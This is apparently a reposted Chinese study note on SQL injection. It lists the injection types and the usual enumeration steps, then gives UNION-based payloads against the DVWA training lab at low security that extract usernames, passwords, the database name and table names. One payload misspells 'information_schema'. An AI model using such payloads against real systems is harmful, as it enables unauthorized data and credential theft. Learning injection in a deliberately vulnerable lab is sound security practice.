SQL注入
型別
1.數字型注入
2.字符型注入
區別:字符型注入需要閉合單引號“ ’ ”,數字型不需要
SQL注入基本步驟
1)判斷是否存在注入,注人是字符型還是數字型,
2)猜解SQL查詢陳述句中的欄位數及欄位順序,
3)獲取當前資料庫名,
4)獲取資料庫中的表名,
5)獲取表中的欄位名,
6)下載資料,
DVWA
low安全級別
- 獲取user及password
'union select user,password from users - 嘗試獲取資料庫名
'union select user(),database() - 嘗試獲取資料庫表名
'union select 1,group_concat(table_name) from informaation_schema. tables where table_schema=database() #
經查看低安全的服務器端代碼可以發現->
程式對來自客戶端的引數id沒有進行任何檢查和過濾
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/243262.html
標籤:其他
上一篇:2021年牛客跨年場有獎賽
下一篇:xss練習筆記
